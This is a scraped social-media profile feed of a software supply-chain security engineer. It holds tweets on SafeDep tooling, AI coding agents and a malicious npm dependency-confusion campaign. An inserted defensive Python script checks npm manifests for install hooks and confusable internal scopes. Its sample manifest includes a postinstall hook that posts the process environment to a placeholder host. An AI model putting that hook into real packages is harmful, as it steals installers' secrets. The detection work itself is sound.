Abhisek Datta
@abh1sek
Followers: 3K | Following: 5K | Media: 216 | Statuses: 3K
Author of 🚀 https://t.co/Tgbp4Dx9V5 | Building @safedepio | Software Engineer | Possibly Security Researcher | Securing Open Source Software | Nerd?
India
Joined May 2008
The SafeDep GitHub App is officially live on the GitHub Marketplace!🎉 Install → Scan → Relax😌 Try it out here👇 https://t.co/ETDd5zfJT9
Books that you should read for improving your software engineering skills. Side effect is, they will prepare you for Staff+ roles:
- Clean Code
- Clean Architecture
- The Pragmatic Programmer
Once you are able to use the ideas:
- Designing Data Intensive Applications
For
Looking forward to this!
So many people keep asking me about Continue. What is it? What are you up to? Here you go... Continue started as a research effort two years ago, with the belief that if the human body is a system, it should also have its leverage points. The simple levers that, when adjusted,
⚠️ Open Source Software Supply Chain attack targeting Hyatt internal dependencies through dependency confusion attack. Read more ➡️ https://t.co/Ss2nz5H0ZX
safedep.io
Three malicious npm packages disguised as Hyatt internal dependencies were discovered using install hooks to execute malicious payloads. All packages share identical attack patterns and infrastruct...
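The two traits named in that summary, an internal-looking package name that npm resolves from the public registry, and a lifecycle install hook that runs code during `npm install`, can both be checked mechanically before a dependency is trusted. The script below is an added illustration, not code from the linked article or from SafeDep's tooling; the manifest, the `.npmrc` and the `@acme-corp` / `@acme-internal` scopes are constructed for the example.

```python
import json
import re
from typing import Dict, List

# Lifecycle scripts that npm runs automatically during `npm install`; a
# malicious package can use any of them to execute a payload without ever
# being imported by the consuming project.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Scopes this (hypothetical) organisation reserves for internal packages.
INTERNAL_SCOPES = frozenset({"@acme-corp", "@acme-internal"})

# Constructed sample manifest (hypothetical; not the packages from the article):
# one public dependency, two internal-looking scoped dependencies, and a
# postinstall hook that posts the process environment to a remote host.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "@acme-corp/build-tools",
    "version": "1.0.0",
    "scripts": {
        "build": "tsc",
        "postinstall": "node -e \"require('http').request({host:'example.invalid',"
                       "method:'POST'}).end(JSON.stringify(process.env))\"",
    },
    "dependencies": {
        "lodash": "^4.17.21",
        "@acme-corp/auth-lib": "^2.1.0",
        "@acme-internal/logger": "^1.0.0",
    },
})

# Constructed .npmrc: only the @acme-corp scope is pinned to a private registry,
# so @acme-internal/* would be fetched from the public registry.
SAMPLE_NPMRC = """\
registry=https://registry.npmjs.org/
@acme-corp:registry=https://npm.acme-corp.internal/
//npm.acme-corp.internal/:_authToken=${NPM_TOKEN}
"""

_SCOPE_REGISTRY = re.compile(r"^(@[^:\s]+):registry=(\S+)")


def scoped_registries(npmrc_text: str) -> Dict[str, str]:
    """Map each npm scope to the registry that .npmrc assigns to it."""
    mapping: Dict[str, str] = {}
    for line in npmrc_text.splitlines():
        m = _SCOPE_REGISTRY.match(line.strip())
        if m:
            mapping[m.group(1)] = m.group(2)
    return mapping


def install_hooks(manifest: dict) -> Dict[str, str]:
    """Return the lifecycle scripts a manifest declares (run this over each
    dependency's package.json, e.g. under node_modules, not just your own)."""
    scripts = manifest.get("scripts") or {}
    return {name: cmd for name, cmd in scripts.items() if name in LIFECYCLE_HOOKS}


def confusable_deps(manifest: dict, internal_scopes, npmrc_text: str) -> List[str]:
    """Internal-scoped dependencies whose scope has no private-registry mapping
    in .npmrc; npm would resolve these from the public registry, which is the
    condition a dependency confusion attack relies on."""
    mapped = scoped_registries(npmrc_text)
    flagged: List[str] = []
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for name in (manifest.get(section) or {}):
            scope = name.split("/")[0] if name.startswith("@") else None
            if scope in internal_scopes and scope not in mapped:
                flagged.append(name)
    return sorted(flagged)


def audit(package_json_text: str, npmrc_text: str, internal_scopes) -> dict:
    """Combine both checks into one report for a manifest/.npmrc pair."""
    manifest = json.loads(package_json_text)
    return {
        "install_hooks": install_hooks(manifest),
        "confusable_dependencies": confusable_deps(manifest, internal_scopes, npmrc_text),
    }


if __name__ == "__main__":
    report = audit(SAMPLE_PACKAGE_JSON, SAMPLE_NPMRC, INTERNAL_SCOPES)
    print(json.dumps(report, indent=2))
```

The scope check only covers the resolution rule in `.npmrc`; a lockfile's `resolved` URLs and any registry-side reservation of internal names are separate controls, and a flagged install hook is a prompt to read the script, not proof of malice on its own (many legitimate native packages build in `postinstall`).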
Looks like there is an onslaught of AI influencers on X. AI generated persona. Similar content. Anyone else seeing this?
🚀 When you have the SafeDep GitHub App installed, you can just sit back, relax, and focus on building. 👉 https://t.co/VUbAaMSIhI
This is true. I am seeing great benefit from Claude Code (and now Cursor) plan mode. In fact, I think it makes sense to check in the plan based on which a certain feature was implemented.
I'm begging you: when having Codex/CC/whatever make a large change to your codebase, have a lengthy conversation with it first, clarifying everything you can. Only then should you ask it to start building.
Next is to figure out the workflow: how to use them to boost productivity while retaining control, and not cancelling out the coding-time advantage with a code review slog.
AI coding agents start getting meaningful when you treat them as a developer and not as a replacement for your own thinking and imagination.
Arguably the most brilliant engineer in FFmpeg left because of this. He reverse engineered dozens of codecs by hand as a volunteer. Then security "researchers" and corporate employees came along and repeatedly insisted "critical" security issues were fixed immediately, waving their
New version of vet released with multiple bug fixes and feature updates.
➡️ Policy language revamp
➡️ Multiple bug fixes
➡️ Console experience improvements
Everything you need to audit, analyse and secure your open source software supply chain. https://t.co/SZavyaJRsO
github.com
Protect against malicious open source packages 🤖. Contribute to safedep/vet development by creating an account on GitHub.
In other news, I have stopped using GitHub Copilot in my nvim. It's a zen experience without the zen mode. Works amazingly well when I am laying down the LLD aspects of the project. Claude Code for analysis, planning and coding a few things as per the declared conventions.
Fairly sure it is. Given the cost of storage and cost of engineering bandwidth for fixing security bugs.
In security, sometimes we conflate quantitative and qualitative solutions. This is a mistake. Even with AI, it will be nearly impossible for a static code analysis tool to beat a security researcher like duke or taviso on novelty (quality). But it can beat them on quantity.